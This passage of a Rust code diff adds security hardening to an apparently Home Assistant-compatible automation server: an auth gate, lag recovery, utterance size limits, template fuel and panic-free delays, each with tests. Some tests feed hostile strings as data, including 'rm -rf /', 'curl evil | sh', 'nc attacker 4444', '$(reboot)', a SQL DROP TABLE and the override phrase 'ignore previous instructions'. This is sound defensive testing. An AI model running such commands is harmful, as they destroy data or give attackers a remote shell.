// client's event stream on a burst (HC-WS-LAG-01).
|
||||
// Skip the dropped window and continue; only a
|
||||
// `Closed` sender ends the task.
|
||||
Err(broadcast::error::RecvError::Lagged(_)) => continue,
|
||||
Err(broadcast::error::RecvError::Closed) => break,
|
||||
},
|
||||
evt = domain_rx.recv() => match evt {
|
||||
Ok(de) => {
|
||||
@@ -316,7 +326,12 @@ impl Connection {
|
||||
if tx_clone.send(payload.to_string()).is_err() { break; }
|
||||
}
|
||||
}
|
||||
Err(_) => break,
|
||||
// Same recoverable-lag handling as the system arm
|
||||
// above (HC-WS-LAG-01): a lagged domain-event
|
||||
// receiver re-syncs and continues; only `Closed`
|
||||
// terminates the subscription.
|
||||
Err(broadcast::error::RecvError::Lagged(_)) => continue,
|
||||
Err(broadcast::error::RecvError::Closed) => break,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -75,3 +75,72 @@ async fn from_env_path_enforces_whitelist() {
|
||||
assert!(!store.is_valid("not_in_whitelist").await);
|
||||
assert!(!store.is_dev_mode().await, "from_env must NOT be dev mode");
|
||||
}
|
||||
|
||||
// ─── HC-API-AUTH-01: `GET /api/` must be auth-gated like every sibling ───
|
||||
//
|
||||
// HA's `APIStatusView` inherits `requires_auth = True`, so `/api/` returns
|
||||
// 401 for a missing/wrong bearer and 200 only for a valid one. The pre-fix
|
||||
// `api_root` took no headers and unconditionally returned 200 — these two
|
||||
// tests FAIL on that code.
|
||||
|
||||
#[tokio::test]
|
||||
async fn api_root_rejects_missing_bearer() {
|
||||
let app = router(provisioned_state("the_real_token").await);
|
||||
let resp = app
|
||||
.oneshot(
|
||||
Request::builder()
|
||||
.uri("/api/")
|
||||
.body(Body::empty())
|
||||
.unwrap(),
|
||||
)
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(
|
||||
resp.status(),
|
||||
StatusCode::UNAUTHORIZED,
|
||||
"GET /api/ with NO bearer must be 401 (HC-API-AUTH-01) — HA's \
|
||||
APIStatusView requires_auth=True; a 200 here lets an \
|
||||
unauthenticated party confirm a live endpoint and tells a \
|
||||
token-validation probe a bad token is good"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn api_root_rejects_wrong_bearer() {
|
||||
let app = router(provisioned_state("the_real_token").await);
|
||||
let resp = app
|
||||
.oneshot(
|
||||
Request::builder()
|
||||
.uri("/api/")
|
||||
.header("Authorization", "Bearer the_wrong_token")
|
||||
.body(Body::empty())
|
||||
.unwrap(),
|
||||
)
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(
|
||||
resp.status(),
|
||||
StatusCode::UNAUTHORIZED,
|
||||
"GET /api/ with a WRONG bearer must be 401 (HC-API-AUTH-01)"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn api_root_accepts_correct_bearer() {
|
||||
let app = router(provisioned_state("the_real_token").await);
|
||||
let resp = app
|
||||
.oneshot(
|
||||
Request::builder()
|
||||
.uri("/api/")
|
||||
.header("Authorization", "Bearer the_real_token")
|
||||
.body(Body::empty())
|
||||
.unwrap(),
|
||||
)
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(
|
||||
resp.status(),
|
||||
StatusCode::OK,
|
||||
"GET /api/ with the correct bearer must still return 200 (API running.)"
|
||||
);
|
||||
}
|
||||
|
||||
@@ -166,3 +166,100 @@ async fn ping_pong_reply_is_received() {
|
||||
assert_eq!(reply["type"], "pong");
|
||||
assert_eq!(reply["id"], 7);
|
||||
}
|
||||
|
||||
/// Variant of [`spawn_server_with_token`] that also returns a `HomeCore`
|
||||
/// handle (cheap `Arc` clone) so the test can fire events into the *same*
|
||||
/// bus the served subscription reads from.
|
||||
async fn spawn_server_returning_homecore(valid_token: &str) -> (SocketAddr, HomeCore) {
|
||||
let hc = HomeCore::new();
|
||||
let tokens = LongLivedTokenStore::empty();
|
||||
tokens.register(valid_token).await;
|
||||
let state = SharedState::with_tokens(hc.clone(), "Test", "test-version", tokens);
|
||||
let app = router(state);
|
||||
|
||||
let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
|
||||
let addr = listener.local_addr().unwrap();
|
||||
tokio::spawn(async move {
|
||||
axum::serve(listener, app).await.unwrap();
|
||||
});
|
||||
(addr, hc)
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn subscription_survives_broadcast_lag() {
|
||||
// HC-WS-LAG-01: the per-subscription event task must treat a broadcast
|
||||
// `Lagged(n)` as RECOVERABLE (re-sync + continue), matching the bus
|
||||
// contract ("Lagged receivers must re-sync") and HA's WS semantics.
|
||||
//
|
||||
// The pre-fix `Err(_) => break` killed the whole event-stream task on
|
||||
// the first lag, so after a >4,096-event burst the client's stream
|
||||
// went permanently silent. This test fires far more than the 4,096
|
||||
// channel capacity to force a `Lagged`, then fires ONE more event and
|
||||
// asserts the subscription still delivers it. FAILS (5s timeout) on
|
||||
// the old code because the task is already dead.
|
||||
use homecore::{Context, DomainEvent};
|
||||
|
||||
let (addr, hc) = spawn_server_returning_homecore("good_token_abc").await;
|
||||
let url = format!("ws://{addr}/api/websocket");
|
||||
let (mut ws, _resp) = connect_async(&url).await.unwrap();
|
||||
|
||||
let _ = next_json(&mut ws).await; // auth_required
|
||||
ws.send(Message::Text(
|
||||
serde_json::json!({"type":"auth","access_token":"good_token_abc"}).to_string(),
|
||||
))
|
||||
.await
|
||||
.unwrap();
|
||||
let auth = next_json(&mut ws).await;
|
||||
assert_eq!(auth["type"], "auth_ok");
|
||||
|
||||
// Subscribe to a specific domain event type so unrelated traffic is
|
||||
// filtered out and we can deterministically match the post-lag event.
|
||||
ws.send(Message::Text(
|
||||
serde_json::json!({"id": 1, "type": "subscribe_events", "event_type": "lag_probe"})
|
||||
.to_string(),
|
||||
))
|
||||
.await
|
||||
.unwrap();
|
||||
let ack = next_json(&mut ws).await; // result ok for the subscribe
|
||||
assert_eq!(ack["type"], "result");
|
||||
assert_eq!(ack["success"], true);
|
||||
|
||||
// Flood the bus far past EVENT_CHANNEL_CAPACITY (4,096) with events the
|
||||
// subscription FILTERS OUT (different event_type). Because the client
|
||||
// never reads them off the WS, the server-side broadcast receiver falls
|
||||
// behind and the NEXT `recv()` yields `Lagged`. We fire synchronously
|
||||
// and don't yield to the WS reader, guaranteeing the overflow.
|
||||
for i in 0..6000u32 {
|
||||
hc.bus().fire_domain(DomainEvent::new(
|
||||
"noise",
|
||||
serde_json::json!({ "i": i }),
|
||||
Context::new(),
|
||||
));
|
||||
}
|
||||
|
||||
// Now fire the event the client IS subscribed to. On the fixed code the
|
||||
// task recovered from `Lagged` and continues, so this is delivered. On
|
||||
// the old code the task broke on `Lagged` and this never arrives.
|
||||
hc.bus().fire_domain(DomainEvent::new(
|
||||
"lag_probe",
|
||||
serde_json::json!({ "marker": "post-lag" }),
|
||||
Context::new(),
|
||||
));
|
||||
|
||||
// Drain frames until we see our post-lag event (ignoring any noise the
|
||||
// filter let slip before the lag), bounded by a timeout.
|
||||
let got = tokio::time::timeout(std::time::Duration::from_secs(5), async {
|
||||
loop {
|
||||
let v = next_json(&mut ws).await;
|
||||
if v["type"] == "event" && v["event"]["event_type"] == "lag_probe" {
|
||||
return v;
|
||||
}
|
||||
}
|
||||
})
|
||||
.await
|
||||
.expect(
|
||||
"subscription went silent after a broadcast lag — Lagged was treated \
|
||||
as fatal (HC-WS-LAG-01)",
|
||||
);
|
||||
assert_eq!(got["event"]["data"]["marker"], "post-lag");
|
||||
}
|
||||
|
||||
@@ -149,6 +149,44 @@ mod tests {
|
||||
assert!(sim_unrel < 0.3, "unrelated similarity too high: {sim_unrel:.3}");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn embeddings_are_structurally_finite() {
|
||||
// SECURITY (NaN-poisoning): the embedding path takes only `&str` and
|
||||
// produces values via FNV feature-hashing + a guarded L2 normalise.
|
||||
// There is NO external float input and NO unguarded division, so a
|
||||
// crafted utterance cannot inject NaN/±Inf into a vector and poison the
|
||||
// cosine k-NN match. Prove every component is finite across adversarial
|
||||
// inputs (empty, punctuation-only, unicode, very long, control chars).
|
||||
for s in [
|
||||
"",
|
||||
"!!! ???",
|
||||
"turn on the kitchen light",
|
||||
"🔥🔥🔥 \u{0}\u{1}\u{7f} mix",
|
||||
&"x".repeat(10_000),
|
||||
"NaN inf -inf 1e999",
|
||||
] {
|
||||
let v = embed(s);
|
||||
assert_eq!(v.len(), EMBEDDING_DIM);
|
||||
assert!(
|
||||
v.iter().all(|x| x.is_finite()),
|
||||
"embedding of {s:?} contained a non-finite component"
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn cosine_with_zero_vector_is_finite_not_nan() {
|
||||
// SECURITY (NaN-poisoning): an empty/punctuation-only utterance embeds
|
||||
// to the zero vector. Cosine against any exemplar must be a finite 0.0,
|
||||
// never NaN — so a below-threshold comparison stays well-defined and the
|
||||
// recognizer falls through (no action) rather than matching on garbage.
|
||||
let zero = embed("!!! ???");
|
||||
let real = embed("turn on the light");
|
||||
let sim = cosine_similarity(&zero, &real);
|
||||
assert!(sim.is_finite(), "cosine vs zero vector must be finite, got {sim}");
|
||||
assert_eq!(sim, 0.0, "dot product with the zero vector is exactly 0");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn identical_text_is_similarity_one() {
|
||||
let a = embed("lock the front door");
|
||||
|
||||
@@ -47,7 +47,9 @@ pub mod pipeline;
|
||||
pub mod embedding;
|
||||
|
||||
pub use intent::{Card, Intent, IntentName, IntentResponse};
|
||||
pub use recognizer::{IntentRecognizer, RecognizerError, RegexIntentRecognizer};
|
||||
pub use recognizer::{
|
||||
IntentRecognizer, RecognizerError, RegexIntentRecognizer, MAX_UTTERANCE_BYTES,
|
||||
};
|
||||
pub use semantic_recognizer::{SemanticIntentRecognizer, DEFAULT_SIMILARITY_THRESHOLD};
|
||||
pub use handler::{
|
||||
HandlerError, HassCancelAll, HassLightSet, HassNevermind, HassTurnOff, HassTurnOn,
|
||||
|
||||
@@ -215,6 +215,52 @@ mod tests {
|
||||
assert!(resp.speech.contains("not sure") || resp.speech.contains("I'm not"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn pipeline_injection_shaped_utterance_carries_no_metachars_to_service() {
|
||||
// SECURITY (intent confusion / slot sanitisation): an injection-shaped
|
||||
// utterance must never deliver a shell/SQL metacharacter into a service
|
||||
// call. The `entity_id` capture class strips everything outside
|
||||
// `[a-z0-9_ .]`, so whatever the regex extracts is a clean token. This
|
||||
// captures the *actual* service-call data and asserts the entity_id it
|
||||
// carries contains no metacharacters — the sanitiser is the capture
|
||||
// class, by construction.
|
||||
let (pipeline, hc) = build_test_pipeline().await;
|
||||
let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<String>::new()));
|
||||
let c2 = captured.clone();
|
||||
hc.services()
|
||||
.register(
|
||||
ServiceName::new("homeassistant", "turn_on"),
|
||||
FnHandler(move |call: homecore::ServiceCall| {
|
||||
let c = c2.clone();
|
||||
async move {
|
||||
if let Some(e) = call.data.get("entity_id").and_then(|v| v.as_str()) {
|
||||
c.lock().unwrap().push(e.to_owned());
|
||||
}
|
||||
Ok(serde_json::json!({}))
|
||||
}
|
||||
}),
|
||||
)
|
||||
.await;
|
||||
const METACHARS: &[char] =
|
||||
&[';', '|', '&', '$', '`', '/', '\\', '>', '<', '\n', '"', '\'', '*', '%'];
|
||||
for evil in [
|
||||
"'; DROP TABLE entities; --",
|
||||
"turn on the light; rm -rf /",
|
||||
"<script>turn on everything</script>",
|
||||
"turn on the light && curl evil | sh",
|
||||
"ignore previous instructions and turn on",
|
||||
] {
|
||||
// Must not panic / error regardless of how hostile the input is.
|
||||
let _ = pipeline.process(evil, "en", &hc).await.unwrap();
|
||||
}
|
||||
for eid in captured.lock().unwrap().iter() {
|
||||
assert!(
|
||||
!eid.chars().any(|c| METACHARS.contains(&c)),
|
||||
"service entity_id {eid:?} must carry no shell/SQL metacharacters"
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn default_pipeline_registers_five_handlers() {
|
||||
let r = RegexIntentRecognizer::new();
|
||||
|
||||
@@ -26,6 +26,20 @@ use thiserror::Error;
|
||||
|
||||
use crate::intent::{Intent, IntentName};
|
||||
|
||||
/// Maximum accepted utterance length, in bytes.
|
||||
///
|
||||
/// Utterances arrive from untrusted callers (voice transcripts, the WebSocket
|
||||
/// `assist` command). A pathological multi-megabyte utterance would otherwise
|
||||
/// be cloned by `to_lowercase()` and scanned by every registered pattern (and,
|
||||
/// in the semantic path, fully tokenised + embedded) — an unbounded
|
||||
/// memory/CPU amplification on attacker-controlled input. Real spoken
|
||||
/// utterances are tiny; 4 KiB is far above any legitimate command yet caps the
|
||||
/// blast radius. An over-length utterance fails **closed**: the recognizer
|
||||
/// returns `Ok(None)` (no intent, no action), exactly like an unrecognised
|
||||
/// phrase. The `regex` crate itself is linear-time (no catastrophic
|
||||
/// backtracking), so this bound is purely an allocation/throughput guard.
|
||||
pub const MAX_UTTERANCE_BYTES: usize = 4096;
|
||||
|
||||
#[derive(Error, Debug)]
|
||||
pub enum RecognizerError {
|
||||
#[error("regex compile error: {0}")]
|
||||
@@ -102,6 +116,12 @@ impl IntentRecognizer for RegexIntentRecognizer {
|
||||
utterance: &str,
|
||||
language: &str,
|
||||
) -> Result<Option<Intent>, RecognizerError> {
|
||||
// Fail-closed on an over-length utterance before any allocation/scan.
|
||||
// Untrusted input must not be able to force an unbounded `to_lowercase`
|
||||
// clone + per-pattern scan. Bound first, then normalise.
|
||||
if utterance.len() > MAX_UTTERANCE_BYTES {
|
||||
return Ok(None);
|
||||
}
|
||||
let normalised = utterance.trim().to_lowercase();
|
||||
let patterns = self.patterns.read().await;
|
||||
for pattern in patterns.iter() {
|
||||
@@ -183,6 +203,55 @@ mod tests {
|
||||
assert!(result.is_none());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn over_length_utterance_fails_closed() {
|
||||
// SECURITY (DoS / fail-closed): an utterance larger than the bound must
|
||||
// return Ok(None) WITHOUT being normalised or scanned. Crucially, even
|
||||
// an over-length utterance that *contains* a matching command must NOT
|
||||
// resolve — fail closed, never open.
|
||||
//
|
||||
// This FAILS against the pre-fix recognizer: there, a giant prefix
|
||||
// followed by "turn on the kitchen light" would still match HassTurnOn
|
||||
// (and force a multi-megabyte `to_lowercase` clone + scan first).
|
||||
let r = turn_on_recognizer().await;
|
||||
let huge = format!("{} turn on the kitchen light", "a ".repeat(MAX_UTTERANCE_BYTES));
|
||||
assert!(huge.len() > MAX_UTTERANCE_BYTES);
|
||||
|
||||
let result = r.recognize(&huge, "en").await.unwrap();
|
||||
assert!(
|
||||
result.is_none(),
|
||||
"over-length utterance must fail closed (no intent, no action)"
|
||||
);
|
||||
|
||||
// And a just-under-bound utterance still works, so the cap doesn't
|
||||
// break legitimate (tiny) commands.
|
||||
let ok = r
|
||||
.recognize("turn on the kitchen light", "en")
|
||||
.await
|
||||
.unwrap();
|
||||
assert!(ok.is_some(), "normal-length command must still resolve");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn pathological_backtracking_pattern_completes_in_bounded_time() {
|
||||
// SECURITY (ReDoS): the `regex` crate is a linear-time finite automaton,
|
||||
// so even a classic catastrophic-backtracking shape `(a+)+$` cannot hang
|
||||
// on a crafted adversarial input. This proves the recognizer terminates
|
||||
// promptly on the worst-case input the regex engine is asked to run.
|
||||
let r = RegexIntentRecognizer::new();
|
||||
r.register("Evil", r"(a+)+$", "*").await.unwrap();
|
||||
// Just under the length bound: all 'a' then a 'b' — the classic input
|
||||
// that destroys a backtracking engine. Linear-time regex shrugs.
|
||||
let evil = format!("{}b", "a".repeat(MAX_UTTERANCE_BYTES - 1));
|
||||
let start = std::time::Instant::now();
|
||||
let _ = r.recognize(&evil, "en").await.unwrap();
|
||||
let elapsed = start.elapsed();
|
||||
assert!(
|
||||
elapsed < std::time::Duration::from_secs(2),
|
||||
"linear-time regex must not hang on adversarial input; took {elapsed:?}"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn language_filter_skips_non_matching() {
|
||||
let r = RegexIntentRecognizer::new();
|
||||
|
||||
@@ -393,6 +393,63 @@ mod tests {
|
||||
assert!(matches!(err, AssistError::ParseError(_)));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn shell_metachars_never_survive_into_a_resolved_slot() {
|
||||
// SECURITY (command/argument injection): two layers of defense.
|
||||
// 1. There is NO subprocess — `spawn` is a lifecycle flag and
|
||||
// `RufloRunnerOpts` is inert, so no argv is ever built.
|
||||
// 2. Even so, the `entity_id` capture class is `[a-z_][a-z0-9_ .]*`,
|
||||
// which *excludes* every shell metacharacter. So when an
|
||||
// injection-shaped utterance DOES resolve (the regex is not exact-
|
||||
// anchored), the captured slot is a clean token with the hostile
|
||||
// tail stripped — never `;`, `|`, `$`, backtick, `&`, `/`, etc.
|
||||
// This pins the slot-sanitisation-by-construction property: a slot value
|
||||
// can never carry a metachar into a (future) argv.
|
||||
let mut runner = LocalRunner::new(turn_on_recognizer().await);
|
||||
runner.spawn(RufloRunnerOpts::default()).await.unwrap();
|
||||
const METACHARS: &[char] = &[';', '|', '&', '$', '`', '/', '\\', '>', '<', '\n', '"', '\''];
|
||||
for evil in [
|
||||
"turn on the light; rm -rf /",
|
||||
"turn on the light && shutdown -h now",
|
||||
"turn on the light | nc attacker 4444",
|
||||
"turn on the light `curl evil.sh | sh`",
|
||||
"turn on the light $(reboot)",
|
||||
] {
|
||||
let resp = runner
|
||||
.send_request(serde_json::json!({"utterance": evil, "language": "en"}))
|
||||
.await
|
||||
.unwrap();
|
||||
if let Some(intent) = resp.intent {
|
||||
if let Some(eid) = intent.entity_id() {
|
||||
assert!(
|
||||
!eid.chars().any(|c| METACHARS.contains(&c)),
|
||||
"resolved entity_id {eid:?} from {evil:?} must contain no shell metachars"
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn runner_opts_are_inert_no_process_spawned() {
|
||||
// SECURITY (command injection): even a hostile `script_path` / `env` in
|
||||
// RufloRunnerOpts is never consumed — `spawn` launches no process. This
|
||||
// documents-and-pins that the data-gated P2 subprocess is genuinely
|
||||
// absent (confirmed Noop/Local, no spawn surface today).
|
||||
let mut env = std::collections::HashMap::new();
|
||||
env.insert("EVIL".to_owned(), "$(rm -rf /)".to_owned());
|
||||
let opts = RufloRunnerOpts {
|
||||
script_path: "/bin/sh -c 'curl evil | sh'".to_owned(),
|
||||
env,
|
||||
timeout_ms: 1,
|
||||
};
|
||||
let mut runner = NoopRunner::new();
|
||||
// No panic, no spawn, no error — the opts are pure data.
|
||||
assert!(runner.spawn(opts.clone()).await.is_ok());
|
||||
let mut local = LocalRunner::new(turn_on_recognizer().await);
|
||||
assert!(local.spawn(opts).await.is_ok());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn local_runner_send_before_spawn_is_not_started() {
|
||||
let runner = LocalRunner::new(turn_on_recognizer().await);
|
||||
|
||||
@@ -135,6 +135,12 @@ impl SemanticIntentRecognizer {
|
||||
utterance: &str,
|
||||
language: &str,
|
||||
) -> Result<(Option<Intent>, Option<f32>), RecognizerError> {
|
||||
// Fail-closed on an over-length utterance before embedding/scanning.
|
||||
// Untrusted input must not force an unbounded `to_lowercase` clone +
|
||||
// full tokenisation/embedding. Mirrors the regex recognizer's bound.
|
||||
if utterance.len() > crate::recognizer::MAX_UTTERANCE_BYTES {
|
||||
return Ok((None, None));
|
||||
}
|
||||
if let Some((id, similarity)) = self.nearest(utterance, language).await {
|
||||
if similarity >= self.threshold {
|
||||
let inner = self.index.read().await;
|
||||
@@ -228,6 +234,32 @@ mod tests {
|
||||
r
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn empty_utterance_against_empty_index_no_panic_no_match() {
|
||||
// SECURITY (NaN/empty-poisoning): an empty (zero-vector) query against an
|
||||
// empty index must not panic and must yield no intent — the recognizer
|
||||
// falls through to the (also empty) regex fallback. Proves the empty-
|
||||
// iterator `max_by` path returns None cleanly.
|
||||
let semantic = SemanticIntentRecognizer::new(RegexIntentRecognizer::new());
|
||||
let result = semantic.recognize("", "en").await.unwrap();
|
||||
assert!(result.is_none(), "empty utterance must produce no intent / no action");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn over_length_utterance_fails_closed_semantic() {
|
||||
// SECURITY (DoS / fail-closed): an over-length utterance must short-
|
||||
// circuit before embedding/scanning, returning no intent — even if it
|
||||
// textually contains an enrolled/fallback-matchable command.
|
||||
let semantic = SemanticIntentRecognizer::new(turn_on_recognizer().await);
|
||||
let huge = format!(
|
||||
"{} turn on the kitchen light",
|
||||
"a ".repeat(crate::recognizer::MAX_UTTERANCE_BYTES)
|
||||
);
|
||||
assert!(huge.len() > crate::recognizer::MAX_UTTERANCE_BYTES);
|
||||
let result = semantic.recognize(&huge, "en").await.unwrap();
|
||||
assert!(result.is_none(), "over-length utterance must fail closed in semantic path");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn semantic_recognizer_delegates_to_fallback() {
|
||||
// No exemplars enrolled → empty HNSW index → pure regex fallback.
|
||||
|
||||
@@ -29,8 +29,10 @@ serde = { version = "1", features = ["derive"] }
|
||||
serde_yaml = "0.9"
|
||||
serde_json = "1"
|
||||
|
||||
# MiniJinja — HA-compatible Jinja2 template engine in pure Rust (ADR-129 §2.1)
|
||||
minijinja = { version = "2", features = ["json", "loader"] }
|
||||
# MiniJinja — HA-compatible Jinja2 template engine in pure Rust (ADR-129 §2.1).
|
||||
# `fuel` bounds instruction count so a malicious `template:` condition cannot
|
||||
# spin the engine with a nested-loop / huge-repeat DoS (HC-SEC-01).
|
||||
minijinja = { version = "2", features = ["json", "loader", "fuel"] }
|
||||
|
||||
# Error handling
|
||||
thiserror = "1"
|
||||
|
||||
@@ -70,6 +70,32 @@ impl ExecutionContext {
|
||||
}
|
||||
}
|
||||
|
||||
/// Upper bound for a `delay` / `wait_for_trigger` timeout, in seconds
|
||||
/// (~100 years). Caps absurd values so `Duration::from_secs_f64` cannot
|
||||
/// overflow-panic on e.g. `seconds: 1e308`, while still allowing any
|
||||
/// realistic automation delay (HC-SEC-02).
|
||||
const MAX_DELAY_SECS: f64 = 3.15e9;
|
||||
|
||||
/// Convert a user-supplied seconds value into a `Duration` without
|
||||
/// panicking (HC-SEC-02).
|
||||
///
|
||||
/// `Duration::from_secs_f64` **panics** on negative, NaN, infinite, or
|
||||
/// overflowing inputs. Those values are all reachable from a crafted
|
||||
/// automation YAML (`delay: {seconds: -1}`, `.nan`, `.inf`, `1e308`), so a
|
||||
/// single hostile config would crash the running automation task. We
|
||||
/// instead saturate to a safe range — matching Home Assistant's lenient
|
||||
/// treatment of a non-positive delay as "no delay":
|
||||
///
|
||||
/// - non-finite (NaN / ±inf) → `0`
|
||||
/// - negative → `0`
|
||||
/// - above [`MAX_DELAY_SECS`] → clamped to the cap
|
||||
fn safe_duration_from_secs(seconds: f64) -> Duration {
|
||||
if !seconds.is_finite() || seconds <= 0.0 {
|
||||
return Duration::ZERO;
|
||||
}
|
||||
Duration::from_secs_f64(seconds.min(MAX_DELAY_SECS))
|
||||
}
|
||||
|
||||
/// Action configuration. Deserialized from YAML `action:` blocks.
|
||||
#[derive(Clone, Debug, Serialize, Deserialize)]
|
||||
#[serde(tag = "action", rename_all = "snake_case")]
|
||||
@@ -154,7 +180,10 @@ impl Action {
|
||||
Ok(result)
|
||||
}
|
||||
Action::Delay { seconds } => {
|
||||
let dur = Duration::from_secs_f64(*seconds);
|
||||
// `safe_duration_from_secs` guards against negative /
|
||||
// NaN / infinite / overflowing values that would
|
||||
// otherwise panic `Duration::from_secs_f64` (HC-SEC-02).
|
||||
let dur = safe_duration_from_secs(*seconds);
|
||||
sleep(dur).await;
|
||||
Ok(serde_json::Value::Null)
|
||||
}
|
||||
@@ -172,7 +201,8 @@ impl Action {
|
||||
// P1 stub — just sleeps for the timeout duration if specified.
|
||||
// Full trigger subscription lands in P2.
|
||||
if let Some(secs) = timeout_seconds {
|
||||
sleep(Duration::from_secs_f64(*secs)).await;
|
||||
// Same non-panicking guard as `Delay` (HC-SEC-02).
|
||||
sleep(safe_duration_from_secs(*secs)).await;
|
||||
}
|
||||
Ok(serde_json::Value::Null)
|
||||
}
|
||||
@@ -243,6 +273,68 @@ mod tests {
|
||||
assert!(result.is_null());
|
||||
}
|
||||
|
||||
// ── HC-SEC-02: a crafted delay must not panic the run task ─────────
|
||||
//
|
||||
// `Duration::from_secs_f64` panics on negative / NaN / infinite /
|
||||
// overflowing inputs, all reachable from a YAML `delay:` value. On the
|
||||
// pre-fix code each of these aborts the spawned automation task with a
|
||||
// panic; the guard saturates to a safe Duration instead. These tests
|
||||
// fail on old (panic = test failure).
|
||||
#[tokio::test]
|
||||
async fn delay_negative_seconds_does_not_panic() {
|
||||
let hc = HomeCore::new();
|
||||
let mut ctx = ExecutionContext::new(hc, "auto");
|
||||
let result = Action::Delay { seconds: -1.0 }.execute(&mut ctx).await;
|
||||
assert!(result.is_ok(), "negative delay must be treated as 0, not panic");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn delay_nan_seconds_does_not_panic() {
|
||||
let hc = HomeCore::new();
|
||||
let mut ctx = ExecutionContext::new(hc, "auto");
|
||||
let result = Action::Delay { seconds: f64::NAN }.execute(&mut ctx).await;
|
||||
assert!(result.is_ok(), "NaN delay must be treated as 0, not panic");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn delay_infinite_seconds_does_not_panic() {
|
||||
let hc = HomeCore::new();
|
||||
let mut ctx = ExecutionContext::new(hc, "auto");
|
||||
let result = Action::Delay { seconds: f64::INFINITY }.execute(&mut ctx).await;
|
||||
assert!(result.is_ok(), "infinite delay must saturate to 0, not panic");
|
||||
}
|
||||
|
||||
// Note: the overflow case (1e300) is covered by the synchronous
|
||||
// `safe_duration_saturates_hostile_values` unit test below — executing
|
||||
// `Action::Delay { seconds: 1e300 }` would genuinely sleep for the
|
||||
// clamped (~100-year) duration, so we assert the conversion directly
|
||||
// rather than through `execute`.
|
||||
|
||||
#[tokio::test]
|
||||
async fn wait_for_trigger_negative_timeout_does_not_panic() {
|
||||
let hc = HomeCore::new();
|
||||
let mut ctx = ExecutionContext::new(hc, "auto");
|
||||
let result = Action::WaitForTrigger { timeout_seconds: Some(-5.0) }
|
||||
.execute(&mut ctx)
|
||||
.await;
|
||||
assert!(result.is_ok(), "negative wait timeout must not panic");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn safe_duration_saturates_hostile_values() {
|
||||
assert_eq!(safe_duration_from_secs(-1.0), Duration::ZERO);
|
||||
assert_eq!(safe_duration_from_secs(f64::NAN), Duration::ZERO);
|
||||
assert_eq!(safe_duration_from_secs(f64::INFINITY), Duration::ZERO);
|
||||
assert_eq!(safe_duration_from_secs(f64::NEG_INFINITY), Duration::ZERO);
|
||||
// legitimate value preserved
|
||||
assert_eq!(safe_duration_from_secs(2.5), Duration::from_secs_f64(2.5));
|
||||
// huge value clamped to the cap, not overflow-panicked
|
||||
assert_eq!(
|
||||
safe_duration_from_secs(1e300),
|
||||
Duration::from_secs_f64(MAX_DELAY_SECS)
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn service_call_unregistered_returns_error() {
|
||||
let hc = HomeCore::new();
|
||||
|
||||
@@ -13,6 +13,26 @@ use homecore::{EntityId, StateMachine};
|
||||
|
||||
use crate::error::AutomationError;
|
||||
|
||||
/// Instruction budget for a single template render (HC-SEC-01).
|
||||
///
|
||||
/// Templates come from user automation config; without a bound a single
|
||||
/// `template:` condition like
|
||||
/// `{% for i in range(10000) %}{% for j in range(10000) %}x{% endfor %}{% endfor %}`
|
||||
/// renders a multi-gigabyte string and pins a CPU for tens of seconds —
|
||||
/// a memory/CPU denial-of-service (the bfld-class "unbounded expansion").
|
||||
/// MiniJinja's `fuel` feature charges ~1 unit per VM instruction; a
|
||||
/// nested loop burns one unit per iteration, so the budget caps total
|
||||
/// work regardless of how the loops are nested. 1,000,000 instructions is
|
||||
/// far more than any legitimate HA template needs (a typical condition is
|
||||
/// a few dozen) while killing the attack in well under a second.
|
||||
const TEMPLATE_FUEL: u64 = 1_000_000;
|
||||
|
||||
/// Hard cap on the source length of a template (HC-SEC-01, defense in
|
||||
/// depth). A legitimate HA `value_template` is a one-liner; anything past
|
||||
/// 64 KiB is rejected before compilation so a pathological source string
|
||||
/// can neither be compiled nor emitted verbatim.
|
||||
const MAX_TEMPLATE_SOURCE_BYTES: usize = 64 * 1024;
|
||||
|
||||
/// MiniJinja environment pre-loaded with HA-compatible globals.
|
||||
///
|
||||
/// Constructed once per `AutomationEngine` and shared via `Arc`. The
|
||||
@@ -27,6 +47,10 @@ impl TemplateEnvironment {
|
||||
pub fn new(states: Arc<StateMachine>) -> Self {
|
||||
let mut env = Environment::new();
|
||||
|
||||
// Bound per-render work so a hostile `template:` condition cannot
|
||||
// DoS the engine via nested loops / huge repeats (HC-SEC-01).
|
||||
env.set_fuel(Some(TEMPLATE_FUEL));
|
||||
|
||||
// --- states(entity_id) ---
|
||||
// Returns the current state string of an entity, or "unavailable".
|
||||
let states_sm = Arc::clone(&states);
|
||||
@@ -88,7 +112,21 @@ impl TemplateEnvironment {
|
||||
}
|
||||
|
||||
/// Render a template string and return the string output.
|
||||
///
|
||||
/// Renders are bounded by an instruction budget ([`TEMPLATE_FUEL`]) and
|
||||
/// a source-length cap ([`MAX_TEMPLATE_SOURCE_BYTES`]); a malicious
|
||||
